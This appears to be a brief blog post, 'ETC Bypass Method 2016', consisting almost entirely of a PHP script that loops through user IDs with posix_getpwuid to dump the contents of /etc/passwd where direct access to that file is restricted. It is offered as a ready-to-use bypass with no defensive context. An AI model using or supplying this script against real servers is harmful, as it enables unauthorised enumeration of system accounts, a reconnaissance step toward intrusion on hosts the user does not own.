Post

ETC Bypass Method 2016

etc-bypass.php

<?php for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd $nothing = posix_getpwuid($uid); if (!empty($nothing)) { while (list ($key, $val) = each($nothing)){ print "$val:"; } print "<br />"; } } ?>
This post is licensed under CC BY 4.0 by the author.